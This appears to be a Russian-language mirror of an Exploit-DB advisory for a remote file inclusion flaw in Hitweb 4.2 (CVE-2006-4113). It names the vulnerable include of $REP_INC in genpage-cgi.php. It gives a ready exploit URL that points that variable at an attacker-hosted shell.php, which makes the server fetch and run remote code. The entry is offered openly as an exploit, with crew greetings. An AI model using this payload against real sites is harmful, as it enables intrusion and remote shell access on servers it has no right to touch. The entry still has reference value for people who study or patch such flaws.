- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2149
- Проверка EDB
-
- Пройдено
- Автор
- DRAGO84
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4113
- Дата публикации
- 2006-08-08
Код:
Hitweb 4.2 Remote Include File
CreW: ToxiC
Bug Found By Drago84
Sorce Code:
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz
Problem is:
include "$REP_INC/lib_database.php";
Page:
genpage-cgi.php
Path:
Declare $REP_INC
Expl:
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?
Greatz:Str0ke
# milw0rm.com [2006-08-08]- Источник
- www.exploit-db.com
